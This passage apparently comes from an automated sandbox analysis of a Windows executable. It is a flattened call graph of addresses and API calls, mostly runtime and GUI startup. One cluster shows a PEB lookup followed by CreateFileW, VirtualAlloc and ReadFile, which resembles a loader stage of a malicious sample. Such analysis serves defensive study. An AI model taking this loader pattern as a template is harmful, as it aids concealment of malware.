_free 96354->96430 96435 acf2c6 20 API calls _free 96356->96435 96357 ad59d7 96431 acf2d9 20 API calls _free 96357->96431 96360 ad5a8d 96436 acf2d9 20 API calls _free 96360->96436 96376 ad5147 EnterCriticalSection 96361->96376 96362 ad59df __wsopen_s 96362->96329 96365 ad5a95 96437 ad27ec 26 API calls _strftime 96365->96437 96366 ad5a25 96368 ad5a56 96366->96368 96369 ad5a41 96366->96369 96377 ad5aa9 96368->96377 96432 acf2d9 20 API calls _free 96369->96432 96372 ad5a46 96433 acf2c6 20 API calls _free 96372->96433 96373 ad5a51 96434 ad5a80 LeaveCriticalSection __wsopen_s 96373->96434 96376->96366 96378 ad5ad7 96377->96378 96379 ad5ad0 96377->96379 96380 ad5adb 96378->96380 96381 ad5afa 96378->96381 96462 ac0a8c 96379->96462 96445 acf2c6 20 API calls _free 96380->96445 96385 ad5b4b 96381->96385 96386 ad5b2e 96381->96386 96384 ad5ae0 96446 acf2d9 20 API calls _free 96384->96446 96389 ad5b61 96385->96389 96451 ad9424 28 API calls __fread_nolock 96385->96451 96448 acf2c6 20 API calls _free 96386->96448 96387 ad5cb1 96387->96373 96438 ad564e 96389->96438 96391 ad5ae7 96447 ad27ec 26 API calls _strftime 96391->96447 96394 ad5b33 96449 acf2d9 20 API calls _free 96394->96449 96398 ad5b3b 96450 ad27ec 26 API calls _strftime 96398->96450 96399 ad5b6f 96404 ad5b95 96399->96404 96405 ad5b73 96399->96405 96400 ad5ba8 96402 ad5bbc 96400->96402 96403 ad5c02 WriteFile 96400->96403 96408 ad5bc4 96402->96408 96409 ad5bf2 96402->96409 96406 ad5c25 GetLastError 96403->96406 96412 ad5b8b 96403->96412 96453 ad542e 45 API calls 3 library calls 96404->96453 96410 ad5c69 96405->96410 96452 ad55e1 GetLastError WriteConsoleW CreateFileW __wsopen_s 96405->96452 96406->96412 96413 ad5bc9 96408->96413 96414 ad5be2 96408->96414 96456 ad56c4 7 API calls 2 library calls 96409->96456 96410->96379 96460 acf2d9 20 API calls _free 96410->96460 96412->96379 96412->96410 96421 ad5c45 96412->96421 96413->96410 96418 ad5bd2 96413->96418 96455 ad5891 8 API calls 2 library calls 96414->96455 96416 ad5be0 96416->96412 96454 ad57a3 7 API calls 2 library calls 96418->96454 96420 ad5c8e 96461 acf2c6 20 API calls _free 96420->96461 96424 ad5c4c 96421->96424 96425 ad5c60 96421->96425 96457 acf2d9 20 API calls _free 96424->96457 96459 acf2a3 20 API calls 2 library calls 96425->96459 96428 ad5c51 96458 acf2c6 20 API calls _free 96428->96458 96430->96357 96431->96362 96432->96372 96433->96373 96434->96362 96435->96360 96436->96365 96437->96362 96439 adf89b __fread_nolock 26 API calls 96438->96439 96440 ad565e 96439->96440 96441 ad5663 96440->96441 96469 ad2d74 38 API calls 2 library calls 96440->96469 96441->96399 96441->96400 96443 ad5686 96443->96441 96444 ad56a4 GetConsoleMode 96443->96444 96444->96441 96445->96384 96446->96391 96447->96379 96448->96394 96449->96398 96450->96379 96451->96389 96452->96412 96453->96412 96454->96416 96455->96416 96456->96416 96457->96428 96458->96379 96459->96379 96460->96420 96461->96379 96463 ac0a95 96462->96463 96464 ac0a97 IsProcessorFeaturePresent 96462->96464 96463->96387 96466 ac0c5d 96464->96466 96470 ac0c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96466->96470 96468 ac0d40 96468->96387 96469->96443 96470->96468 96479 ad8585 96471->96479 96473 ad862b 96473->96346 96474->96339 96475->96346 96476->96343 96477->96347 96478->96346 96480 ad8591 ___BuildCatchObject 96479->96480 96490 ad5147 EnterCriticalSection 96480->96490 96482 ad859f 96483 ad85c6 96482->96483 96484 ad85d1 96482->96484 96491 ad86ae 96483->96491 96506 acf2d9 20 API calls _free 96484->96506 96487 ad85cc 96507 ad85fb LeaveCriticalSection __wsopen_s 96487->96507 96489 ad85ee __wsopen_s 96489->96473 96490->96482 96508 ad53c4 96491->96508 96493 ad86be 96494 ad86c4 96493->96494 96495 ad86f6 96493->96495 96497 ad53c4 __wsopen_s 26 API calls 96493->96497 96521 ad5333 21 API calls 3 library calls 96494->96521 96495->96494 96498 ad53c4 __wsopen_s 26 API calls 96495->96498 96500 ad86ed 96497->96500 96501 ad8702 FindCloseChangeNotification 96498->96501 96499 ad871c 96502 ad873e 96499->96502 96522 acf2a3 20 API calls 2 library calls 96499->96522 96504 ad53c4 __wsopen_s 26 API calls 96500->96504 96501->96494 96505 ad870e GetLastError 96501->96505 96502->96487 96504->96495 96505->96494 96506->96487 96507->96489 96509 ad53d1 96508->96509 96511 ad53e6 96508->96511 96510 acf2c6 __dosmaperr 20 API calls 96509->96510 96513 ad53d6 96510->96513 96512 acf2c6 __dosmaperr 20 API calls 96511->96512 96515 ad540b 96511->96515 96516 ad5416 96512->96516 96514 acf2d9 _free 20 API calls 96513->96514 96517 ad53de 96514->96517 96515->96493 96518 acf2d9 _free 20 API calls 96516->96518 96517->96493 96519 ad541e 96518->96519 96520 ad27ec _strftime 26 API calls 96519->96520 96520->96517 96521->96499 96522->96502 96523->95759 96524 ae2ba5 96525 ae2baf 96524->96525 96526 aa2b25 96524->96526 96567 aa3a5a 96525->96567 96552 aa2b83 7 API calls 96526->96552 96530 ae2bb8 96574 aa9cb3 96530->96574 96533 aa2b2f 96542 aa2b44 96533->96542 96556 aa3837 96533->96556 96534 ae2bc6 96535 ae2bce 96534->96535 96536 ae2bf5 96534->96536 96580 aa33c6 96535->96580 96537 aa33c6 22 API calls 96536->96537 96550 ae2bf1 GetForegroundWindow ShellExecuteW 96537->96550 96543 aa2b5f 96542->96543 96566 aa30f2 Shell_NotifyIconW ___scrt_fastfail 96542->96566 96548 aa2b66 SetCurrentDirectoryW 96543->96548 96547 aa33c6 22 API calls 96547->96550 96551 aa2b7a 96548->96551 96549 ae2c26 96549->96543 96550->96549 96598 aa2cd4 7 API calls 96552->96598 96554 aa2b2a 96555 aa2c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 96554->96555 96555->96533 96557 aa3862 ___scrt_fastfail 96556->96557 96599 aa4212 96557->96599 96560 aa38e8 96562 ae3386 Shell_NotifyIconW 96560->96562 96563 aa3906 Shell_NotifyIconW 96560->96563 96603 aa3923 96563->96603 96565 aa391c 96565->96542 96566->96543 96568 ae1f50 __wsopen_s 96567->96568 96569 aa3a67 GetModuleFileNameW 96568->96569 96570 aa9cb3 22 API calls 96569->96570 96571 aa3a8d 96570->96571 96572 aa3aa2 23 API calls 96571->96572 96573 aa3a97 96572->96573 96573->96530 96575 aa9cc2 _wcslen 96574->96575 96576 abfe0b 22 API calls 96575->96576 96577 aa9cea __fread_nolock 96576->96577 96578 abfddb 22 API calls 96577->96578 96579 aa9d00 96578->96579 96579->96534 96581 ae30bb 96580->96581 96582 aa33dd 96580->96582 96584 abfddb 22 API calls 96581->96584 96635 aa33ee 96582->96635 96586 ae30c5 _wcslen 96584->96586 96585 aa33e8 96589 aa6350 96585->96589 96587 abfe0b 22 API calls 96586->96587 96588 ae30fe __fread_nolock 96587->96588 96590 aa6362 96589->96590 96591 ae4a51 96589->96591 96650 aa6373 96590->96650 96660 aa4a88 22 API calls __fread_nolock 96591->96660 96594 aa636e 96594->96547 96595 ae4a5b 96596 ae4a67 96595->96596 96597 aaa8c7 22 API calls 96595->96597 96597->96596 96598->96554 96600 ae35a4 96599->96600 96601 aa38b7 96599->96601 96600->96601 96602 ae35ad DestroyIcon 96600->96602 96601->96560 96625 b0c874 42 API calls _strftime 96601->96625 96602->96601 96604 aa393f 96603->96604 96605 aa3a13 96603->96605 96626 aa6270 96604->96626 96605->96565 96608 aa395a 96610 aa6b57 22 API calls 96608->96610 96609 ae3393 LoadStringW 96611 ae33ad 96609->96611 96612 aa396f 96610->96612 96619 aa3994 ___scrt_fastfail 96611->96619 96631 aaa8c7 96611->96631 96613 aa397c 96612->96613 96614 ae33c9 96612->96614 96613->96611 96616 aa3986 96613->96616 96617 aa6350 22 API calls 96614->96617 96618 aa6350 22 API calls 96616->96618 96620 ae33d7 96617->96620 96618->96619 96622 aa39f9 Shell_NotifyIconW 96619->96622 96620->96619 96621 aa33c6 22 API calls 96620->96621 96623 ae33f9 96621->96623 96622->96605 96624 aa33c6 22 API calls 96623->96624 96624->96619 96625->96560 96627 abfe0b 22 API calls 96626->96627 96628 aa6295 96627->96628 96629 abfddb 22 API calls 96628->96629 96630 aa394d 96629->96630 96630->96608 96630->96609 96632 aaa8ea __fread_nolock 96631->96632 96633 aaa8db 96631->96633 96632->96619 96633->96632 96634 abfe0b 22 API calls 96633->96634 96634->96632 96636 aa33fe _wcslen 96635->96636 96637 ae311d 96636->96637 96638 aa3411 96636->96638 96639 abfddb 22 API calls 96637->96639 96645 aaa587 96638->96645 96641 ae3127 96639->96641 96643 abfe0b 22 API calls 96641->96643 96642 aa341e __fread_nolock 96642->96585 96644 ae3157 __fread_nolock 96643->96644 96646 aaa59d 96645->96646 96649 aaa598 __fread_nolock 96645->96649 96647 aef80f 96646->96647 96648 abfe0b 22 API calls 96646->96648 96648->96649 96649->96642 96651 aa63b6 __fread_nolock 96650->96651 96652 aa6382 96650->96652 96651->96594 96652->96651 96653 ae4a82 96652->96653 96654 aa63a9 96652->96654 96655 abfddb 22 API calls 96653->96655 96656 aaa587 22 API calls 96654->96656 96657 ae4a91 96655->96657 96656->96651 96658 abfe0b 22 API calls 96657->96658 96659 ae4ac5 __fread_nolock 96658->96659 96660->96595 96661 210295b 96662 2102960 96661->96662 96663 2100000 GetPEB 96662->96663 96664 210296c 96663->96664 96665 2102a20 96664->96665 96666 210298a 96664->96666 96683 21032d0 9 API calls 96665->96683 96670 2102630 96666->96670 96669 2102a07 96671 2100000 GetPEB 96670->96671 96674 21026cf 96671->96674 96673 2102700 CreateFileW 96673->96674 96679 210270d 96673->96679 96675 2102729 VirtualAlloc 96674->96675 96674->96679 96681 2102830 FindCloseChangeNotification 96674->96681 96682 2102840 VirtualFree 96674->96682 96684 2103540 GetPEB 96674->96684 96676 210274a ReadFile 96675->96676 96675->96679 96676->96679 96680 2102768 VirtualAlloc 96676->96680 96677 210292a 96677->96669 96678 210291c VirtualFree 96678->96677 96679->96677 96679->96678 96680->96674 96680->96679 96681->96674 96682->96674 96683->96669 96685 210356a 96684->96685 96685->96673 96686 aa1044 96691 aa10f3 96686->96691 96688 aa104a 96727 ac00a3 29 API calls __onexit 96688->96727 96690 aa1054 96728 aa1398 96691->96728 96695 aa116a 96696 aaa961 22 API calls 96695->96696 96697 aa1174 96696->96697 96698 aaa961 22 API calls 96697->96698 96699 aa117e 96698->96699 96700 aaa961 22 API calls 96699->96700 96701 aa1188 96700->96701 96702 aaa961 22 API calls 96701->96702 96703 aa11c6 96702->96703 96704 aaa961 22 API calls 96703->96704 96705 aa1292 96704->96705 96738 aa171c 96705->96738 96709 aa12c4 96710 aaa961 22 API calls 96709->96710 96711 aa12ce 96710->96711 96759 ab1940 96711->96759 96713 aa12f9 96769 aa1aab 96713->96769 96715 aa1315 96716 aa1325 GetStdHandle 96715->96716 96717 aa137a 96716->96717 96718 ae2485 96716->96718 96721 aa1387 OleInitialize 96717->96721 96718->96717 96719 ae248e 96718->96719 96720 abfddb 22 API calls 96719->96720 96722 ae2495 96720->96722 96721->96688 96776 b1011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 96722->96776 96724 ae249e 96777 b10944 CreateThread 96724->96777 96726 ae24aa CloseHandle 96726->96717 96727->96690 96778 aa13f1 96728->96778 96731 aa13f1 22 API calls 96732 aa13d0 96731->96732 96733 aaa961 22 API calls 96732->96733 96734 aa13dc 96733->96734 96735 aa6b57 22 API calls 96734->96735 96736 aa1129 96735->96736 96737 aa1bc3 6 API calls 96736->96737 96737->96695 96739 aaa961 22 API calls 96738->96739 96740 aa172c 96739->96740 96741 aaa961 22 API calls 96740->96741 96742 aa1734 96741->96742 96743 aaa961 22 API calls 96742->96743 96744 aa174f 96743->96744 96745 abfddb 22 API calls 96744->96745 96746 aa129c 96745->96746 96747 aa1b4a 96746->96747 96748 aa1b58 96747->96748 96749 aaa961 22 API calls 96748->96749 96750 aa1b63 96749->96750 96751 aaa961 22 API calls 96750->96751 96752 aa1b6e 96751->96752 96753 aaa961 22 API calls 96752->96753 96754 aa1b79 96753->96754 96755 aaa961 22 API calls 96754->96755 96756 aa1b84 96755->96756 96757 abfddb 22 API calls 96756->96757 96758 aa1b96 RegisterWindowMessageW 96757->96758 96758->96709 96760 ab1981 96759->96760 96761 ab195d 96759->96761 96785 ac0242 5 API calls __Init_thread_wait 96760->96785 96768 ab196e 96761->96768 96787 ac0242 5 API calls __Init_thread_wait 96761->96787 96763 ab198b 96763->96761 96786 ac01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96763->96786 96765 ab8727 96765->96768 96788 ac01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96765->96788 96768->96713 96770 aa1abb 96769->96770 96771 ae272d 96769->96771 96772 abfddb 22 API calls 96770->96772 96789 b13209 23 API calls 96771->96789 96774 aa1ac3 96772->96774 96774->96715 96775 ae2738 96776->96724 96777->96726 96790 b1092a 28 API calls 96777->96790 96779 aaa961 22 API calls 96778->96779 96780 aa13fc 96779->96780 96781 aaa961 22 API calls 96780->96781 96782 aa1404 96781->96782 96783 aaa961 22 API calls 96782->96783 96784 aa13c6 96783->96784 96784->96731 96785->96763 96786->96761 96787->96765 96788->96768 96789->96775 96791 af2a00 96805 aad7b0 ISource 96791->96805 96792 aadb11 PeekMessageW 96792->96805 96793 aad807 GetInputState 96793->96792 96793->96805 96794 af1cbe TranslateAcceleratorW 96794->96805 96796 aadb8f PeekMessageW 96796->96805 96797 aadb73 TranslateMessage DispatchMessageW 96797->96796 96798 aada04 timeGetTime 96798->96805 96799 aadbaf Sleep 96816 aadbc0 96799->96816 96800 af2b74 Sleep 96800->96816 96801 af1dda timeGetTime 96967 abe300 23 API calls 96801->96967 96802 abe551 timeGetTime 96802->96816 96805->96792 96805->96793 96805->96794 96805->96796 96805->96797 96805->96798 96805->96799 96805->96800 96805->96801 96807 aad9d5 96805->96807 96823 aadd50 96805->96823 96830 aadfd0 96805->96830 96853 ab1310 96805->96853 96908 aabf40 96805->96908 96966 abedf6 IsDialogMessageW GetClassLongW 96805->96966 96968 b13a2a 23 API calls 96805->96968 96969 aaec40 96805->96969 96993 b1359c 82 API calls __wsopen_s 96805->96993 96806 af2c0b GetExitCodeProcess 96810 af2c37 CloseHandle 96806->96810 96811 af2c21 WaitForSingleObject 96806->96811 96808 b329bf GetForegroundWindow 96808->96816 96810->96816 96811->96805 96811->96810 96812 af2a31 96812->96807 96813 af2ca9 Sleep 96813->96805 96816->96802 96816->96805 96816->96806 96816->96807 96816->96808 96816->96812 96816->96813 96994 b25658 23 API calls 96816->96994 96995 b0e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 96816->96995 96996 b0d4dc 47 API calls 96816->96996 96824 aadd6f 96823->96824 96825 aadd83 96823->96825 96997 aad260 239 API calls 2 library calls 96824->96997 96998 b1359c 82 API calls __wsopen_s 96825->96998 96828 aadd7a 96828->96805 96829 af2f75 96829->96829 96831 aae010 96830->96831 96848 aae0dc ISource 96831->96848 97001 ac0242 5 API calls __Init_thread_wait 96831->97001 96834 af2fca 96836 aaa961 22 API calls 96834->96836 96834->96848 96835 aaa961 22 API calls 96835->96848 96837 af2fe4 96836->96837 97002 ac00a3 29 API calls __onexit 96837->97002 96841 af2fee 97003 ac01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96841->97003 96844 aaec40 239 API calls 96844->96848 96846 aaa8c7 22 API calls 96846->96848 96847 ab04f0 22 API calls 96847->96848 96848->96835 96848->96844 96848->96846 96848->96847 96849 aae3e1 96848->96849 96850 b1359c 82 API calls 96848->96850 96999 aaa81b 41 API calls 96848->96999 97000 aba308 239 API calls 96848->97000 97004 ac0242 5 API calls __Init_thread_wait 96848->97004 97005 ac00a3 29 API calls __onexit 96848->97005 97006 ac01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96848->97006 97007 b247d4 239 API calls 96848->97007 97008 b268c1 239 API calls 96848->97008 96849->96805 96850->96848 96854 ab17b0 96853->96854 96855 ab1376 96853->96855 97139 ac0242 5 API calls __Init_thread_wait 96854->97139 96857 ab1390 96855->96857 96858 af6331 96855->96858 96859 ab1940 9 API calls 96857->96859 96860 af633d 96858->96860 97144 b2709c 239 API calls 96858->97144 96863 ab13a0 96859->96863 96860->96805 96862 ab17ba 96864 ab17fb 96862->96864 96866 aa9cb3 22 API calls 96862->96866 96865 ab1940 9 API calls 96863->96865 96868 af6346 96864->96868 96870 ab182c 96864->96870 96867 ab13b6 96865->96867 96874 ab17d4 96866->96874 96867->96864 96869 ab13ec 96867->96869 97145 b1359c 82 API calls __wsopen_s 96868->97145 96869->96868 96894 ab1408 __fread_nolock 96869->96894 97141 aaaceb 23 API calls ISource 96870->97141 96873 ab1839 97142 abd217 239 API calls 96873->97142 97140 ac01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96874->97140 96877 af636e 97146 b1359c 82 API calls __wsopen_s 96877->97146 96878 ab152f 96880 ab153c 96878->96880 96881 af63d1 96878->96881 96882 ab1940 9 API calls 96880->96882 97148 b25745 54 API calls _wcslen 96881->97148 96884 ab1549 96882->96884 96888 ab1940 9 API calls 96884->96888 96899 ab15c7 ISource 96884->96899 96885 abfddb 22 API calls 96885->96894 96886 abfe0b 22 API calls 96886->96894 96887 ab1872 97143 abfaeb 23 API calls 96887->97143 96897 ab1563 96888->96897 96889 ab171d 96889->96805 96892 aaec40 239 API calls 96892->96894 96893 ab167b ISource 96893->96889 97138 abce17 22 API calls ISource 96893->97138 96894->96873 96894->96877 96894->96878 96894->96885 96894->96886 96894->96892 96895 af63b2 96894->96895 96894->96899 97147 b1359c 82 API calls __wsopen_s 96895->97147 96897->96899 96901 aaa8c7 22 API calls 96897->96901 96898 ab1940 9 API calls 96898->96899 96899->96887 96899->96893 96899->96898 96904 aa4f39 68 API calls 96899->96904 97009 b2d482 96899->97009 97049 b0d4ce 96899->97049 97052 b2959f 96899->97052 97055 b16ef1 96899->97055 97135 b2958b 96899->97135 97149 b1359c 82 API calls __wsopen_s 96899->97149 96901->96899 96904->96899 97507 aaadf0 96908->97507 96910 aabf9d 96911 aabfa9 96910->96911 96912 af04b6 96910->96912 96914 af04c6 96911->96914 96915 aac01e 96911->96915 97520 b1359c 82 API calls __wsopen_s 96912->97520 97521 b1359c 82 API calls __wsopen_s 96914->97521 97512 aaac91 96915->97512 96918 aac7da 96922 abfe0b 22 API calls 96918->96922 96927 aac808 __fread_nolock 96922->96927 96924 af04f5 96928 af055a 96924->96928 97522 abd217 239 API calls 96924->97522 96931 abfe0b 22 API calls 96927->96931 96965 aac603 96928->96965 97523 b1359c 82 API calls __wsopen_s 96928->97523 96929 b07120 22 API calls 96951 aac039 ISource __fread_nolock 96929->96951 96930 af091a 97533 b13209 23 API calls 96930->97533 96958 aac350 ISource __fread_nolock 96931->96958 96932 aaaf8a 22 API calls 96932->96951 96935 aaec40 239 API calls 96935->96951 96936 af08a5 96937 aaec40 239 API calls 96936->96937 96939 af08cf 96937->96939 96939->96965 97531 aaa81b 41 API calls 96939->97531 96940 af0591 97524 b1359c 82 API calls __wsopen_s 96940->97524 96941 af08f6 97532 b1359c 82 API calls __wsopen_s 96941->97532 96946 aabbe0 40 API calls 96946->96951 96947 aac3ac 96947->96805 96949 aac237 96950 aac253 96949->96950 96953 aaa8c7 22 API calls 96949->96953 96954 af0976 96950->96954 96960 aac297 ISource 96950->96960 96951->96918 96951->96924 96951->96927 96951->96928 96951->96929 96951->96930 96951->96932 96951->96935 96951->96936 96951->96940 96951->96941 96951->96946 96951->96949 96952 abfe0b 22 API calls 96951->96952 96956 abfddb 22 API calls 96951->96956 96959 af09bf 96951->96959 96951->96965 97516 aaad81 22 API calls 96951->97516 97525 b07099 22 API calls __fread_nolock 96951->97525 97526 b25745 54 API calls _wcslen 96951->97526 97527 abaa42 22 API calls ISource 96951->97527 97528 b0f05c 40 API calls 96951->97528 97529 aaa993 41 API calls 96951->97529 97530 aaaceb 23 API calls ISource 96951->97530 96952->96951 96953->96950 97534 aaaceb 23 API calls ISource 96954->97534 96956->96951 96958->96947 97519 abce17 22 API calls ISource 96958->97519 96959->96965 97535 b1359c 82 API calls __wsopen_s 96959->97535 96960->96959 97517 aaaceb 23 API calls ISource 96960->97517 96962 aac335 96962->96959 96963 aac342 96962->96963 97518 aaa704 22 API calls ISource 96963->97518 96965->96805 96966->96805 96967->96805 96968->96805 96988 aaec76 ISource 96969->96988 96970 abfddb 22 API calls 96970->96988 96971 aafef7 96979 aaa8c7 22 API calls 96971->96979 96984 aaed9d ISource 96971->96984 96974 af4b0b 97540 b1359c 82 API calls __wsopen_s 96974->97540 96975 aaa8c7 22 API calls 96975->96988 96976 af4600 96981 aaa8c7 22 API calls 96976->96981 96976->96984 96979->96984 96980 ac0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96980->96988 96981->96984 96983 aafbe3 96983->96984 96987 af4bdc 96983->96987 96992 aaf3ae ISource 96983->96992 96984->96805 96985 aaa961 22 API calls 96985->96988 96986 ac00a3 29 API calls pre_c_initialization 96986->96988 97541 b1359c 82 API calls __wsopen_s 96987->97541 96988->96970 96988->96971 96988->96974 96988->96975 96988->96976 96988->96980 96988->96983 96988->96984 96988->96985 96988->96986 96990 ac01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96988->96990 96991 af4beb 96988->96991 96988->96992 97537 ab01e0 239 API calls 2 library calls 96988->97537 97538 ab06a0 41 API calls ISource 96988->97538 96990->96988 97542 b1359c 82 API calls __wsopen_s 96991->97542 96992->96984 97539 b1359c 82 API calls __wsopen_s 96992->97539 96993->96805 96994->96816 96995->96816 96996->96816 96997->96828 96998->96829 96999->96848 97000->96848 97001->96834 97002->96841 97003->96848 97004->96848 97005->96848 97006->96848 97007->96848 97008->96848 97150 b11e96 97009->97150 97011 b2d49d 97012 b2d4b1 97011->97012 97013 b2d4ee 97011->97013 97180 aa9c6e 22 API calls 97012->97180 97016 b2d4fc 97013->97016 97181 aab567 39 API calls 97013->97181 97017 b2d548 97016->97017 97018 b2d51f 97016->97018 97020 b2d600 97017->97020 97023 b2d55a 97017->97023 97182 aa9c6e 22 API calls 97018->97182 97154 abf1d8 97020->97154 97022 b2d4be 97022->96899 97025 b2d55f 97023->97025 97026 b2d59d 97023->97026 97029 aa6270 22 API calls 97025->97029 97028 abfe0b 22 API calls 97026->97028 97032 b2d5a3 97028->97032 97030 b2d572 97029->97030 97183 aa6e90 97030->97183 97031 b2d619 97034 aa6270 22 API calls 97031->97034 97037 aa6270 22 API calls 97032->97037 97036 b2d623 97034->97036 97035 b2d582 97195 aa62b5 22 API calls 97035->97195 97039 b2d630 97036->97039 97040 b2d637 97036->97040 97041 b2d5dd 97037->97041 97172 aa6d9e MultiByteToWideChar 97039->97172 97197 aa6e14 24 API calls 97040->97197 97044 aa6e90 22 API calls 97041->97044 97045 b2d5ea 97044->97045 97196 aa62b5 22 API calls 97045->97196 97046 b2d635 97198 aa62b5 22 API calls 97046->97198 97203 b0dbbe lstrlenW 97049->97203 97208 b27f59 97052->97208 97054 b295af 97054->96899 97056 aaa961 22 API calls 97055->97056 97057 b16f1d 97056->97057 97058 aaa961 22 API calls 97057->97058 97059 b16f26 97058->97059 97060 b16f3a 97059->97060 97495 aab567 39 API calls 97059->97495 97062 aa7510 53 API calls 97060->97062 97069 b16f57 _wcslen 97062->97069 97063 b16fbc 97065 aa7510 53 API calls 97063->97065 97064 b170bf 97066 aa4ecb 94 API calls 97064->97066 97067 b16fc8 97065->97067 97068 b170d0 97066->97068 97072 aaa8c7 22 API calls 97067->97072 97077 b16fdb 97067->97077 97070 b170e5 97068->97070 97073 aa4ecb 94 API calls 97068->97073 97069->97063 97069->97064 97134 b170e9 97069->97134 97071 aaa961 22 API calls 97070->97071 97070->97134 97074 b1711a 97071->97074 97072->97077 97073->97070 97075 aaa961 22 API calls 97074->97075 97079 b17126 97075->97079 97076 b17027 97078 aa7510 53 API calls 97076->97078 97077->97076 97080 b17005 97077->97080 97083 aaa8c7 22 API calls 97077->97083 97081 b17034 97078->97081 97082 aaa961 22 API calls 97079->97082 97084 aa33c6 22 API calls 97080->97084 97085 b17047 97081->97085 97086 b1703d 97081->97086 97087 b1712f 97082->97087 97083->97080 97088 b1700f 97084->97088 97496 b0e199 GetFileAttributesW 97085->97496 97089 aaa8c7 22 API calls 97086->97089 97091 aaa961 22 API calls 97087->97091 97092 aa7510 53 API calls 97088->97092 97089->97085 97094 b17138 97091->97094 97095 b1701b 97092->97095 97093 b17050 97096 b17063 97093->97096 97100 aa4c6d 22 API calls 97093->97100 97097 aa7510 53 API calls 97094->97097 97098 aa6350 22 API calls 97095->97098 97099 aa7510 53 API calls 97096->97099 97106 b17069 97096->97106 97101 b17145 97097->97101 97098->97076 97102 b170a0 97099->97102 97100->97096 97341 aa525f 97101->97341 97497 b0d076 57 API calls 97102->97497 97105 b17166 97383 aa4c6d 97105->97383 97106->97134 97109 b171a9 97111 aaa8c7 22 API calls 97109->97111 97110 aa4c6d 22 API calls 97112 b17186 97110->97112 97113 b171ba 97111->97113 97112->97109 97115 aa6b57 22 API calls 97112->97115 97114 aa6350 22 API calls 97113->97114 97116 b171c8 97114->97116 97117 b1719b 97115->97117 97118 aa6350 22 API calls 97116->97118 97119 aa6b57 22 API calls 97117->97119 97120 b171d6 97118->97120 97119->97109 97121 aa6350 22 API calls 97120->97121 97122 b171e4 97121->97122 97123 aa7510 53 API calls 97122->97123 97124 b171f0 97123->97124 97386 b0d7bc 97124->97386 97126 b17201 97127 b0d4ce 4 API calls 97126->97127 97128 b1720b 97127->97128 97129 aa7510 53 API calls 97128->97129 97133 b17239 97128->97133 97130 b17229 97129->97130 97440 b12947 97130->97440 97132 aa4f39 68 API calls 97132->97134 97133->97132 97134->96899 97136 b27f59 120 API calls 97135->97136 97137 b2959b 97136->97137 97137->96899 97138->96893 97139->96862 97140->96864 97141->96873 97142->96887 97143->96887 97144->96860 97145->96899 97146->96899 97147->96899 97148->96897 97149->96899 97151 b11e9f 97150->97151 97153 b11ea4 97150->97153 97199 b10f67 24 API calls __fread_nolock 97151->97199 97153->97011 97155 abfe0b 22 API calls 97154->97155 97156 abf1ef 97155->97156 97157 abfddb 22 API calls 97156->97157 97158 abf1fb 97157->97158 97159 abf733 97158->97159 97160 abf77f 97159->97160 97161 abf741 97159->97161 97201 b0ca5b 22 API calls __fread_nolock 97160->97201 97161->97160 97163 abf74c 97161->97163 97164 aff2fe 97163->97164 97165 abf75a 97163->97165 97167 abfddb 22 API calls 97164->97167 97200 abf788 22 API calls 97165->97200 97168 aff308 97167->97168 97170 abfe0b 22 API calls 97168->97170 97169 abf762 __fread_nolock 97169->97031 97171 aff32d 97170->97171 97173 aa6e0b 97172->97173 97174 aa6dc7 97172->97174 97176 aaa6c3 22 API calls 97173->97176 97175 abfe0b 22 API calls 97174->97175 97177 aa6ddc MultiByteToWideChar 97175->97177 97179 aa6dff 97176->97179 97178 aa6e90 22 API calls 97177->97178 97178->97179 97179->97046 97180->97022 97181->97016 97182->97022 97184 aa6ea3 97183->97184 97185 aa6f24 97183->97185 97184->97185 97187 aa6eaf 97184->97187 97186 aa93b2 22 API calls 97185->97186 97192 aa6ec1 __fread_nolock 97186->97192 97188 aa6eb9 97187->97188 97189 aa6ee7 97187->97189 97202 aa6f34 22 API calls 97188->97202 97191 abfddb 22 API calls 97189->97191 97193 aa6ef1 97191->97193 97192->97035 97194 abfe0b 22 API calls 97193->97194 97194->97192 97195->97022 97196->97022 97197->97046 97198->97022 97199->97153 97200->97169 97201->97169 97202->97192 97204 b0d4d5 97203->97204 97205 b0dbdc GetFileAttributesW 97203->97205 97204->96899 97205->97204 97206 b0dbe8 FindFirstFileW 97205->97206 97206->97204 97207 b0dbf9 FindClose 97206->97207 97207->97204 97246 aa7510 97208->97246 97212 b28281 97213 b2844f 97212->97213 97217 b2828f 97212->97217 97310 b28ee4 60 API calls 97213->97310 97216 b2845e 97216->97217 97218 b2846a 97216->97218 97282 b27e86 97217->97282 97232 b27fd5 ISource 97218->97232 97219 aa7510 53 API calls 97237 b28049 97219->97237 97224 b282c8 97297 abfc70 97224->97297 97227 b28302 97304 aa63eb 22 API calls 97227->97304 97228 b282e8 97303 b1359c 82 API calls __wsopen_s 97228->97303 97231 b282f3 GetCurrentProcess TerminateProcess 97231->97227 97232->97054 97233 b28311 97305 aa6a50 22 API calls 97233->97305 97235 b2832a 97244 b28352 97235->97244 97306 ab04f0 22 API calls 97235->97306 97237->97212 97237->97219 97237->97232 97301 b0417d 22 API calls __fread_nolock 97237->97301 97302 b2851d 42 API calls _strftime 97237->97302 97238 b284c5 97238->97232 97242 b284d9 FreeLibrary 97238->97242 97239 b28341 97307 b28b7b 75 API calls 97239->97307 97242->97232 97244->97238 97308 ab04f0 22 API calls 97244->97308 97309 aaaceb 23 API calls ISource 97244->97309 97311 b28b7b 75 API calls 97244->97311 97247 aa7525 97246->97247 97263 aa7522 97246->97263 97248 aa755b 97247->97248 97249 aa752d 97247->97249 97251 aa756d 97248->97251 97256 ae500f 97248->97256 97259 ae50f6 97248->97259 97312 ac51c6 26 API calls 97249->97312 97313 abfb21 51 API calls 97251->97313 97254 aa753d 97258 abfddb 22 API calls 97254->97258 97255 ae510e 97255->97255 97262 abfe0b 22 API calls 97256->97262 97268 ae5088 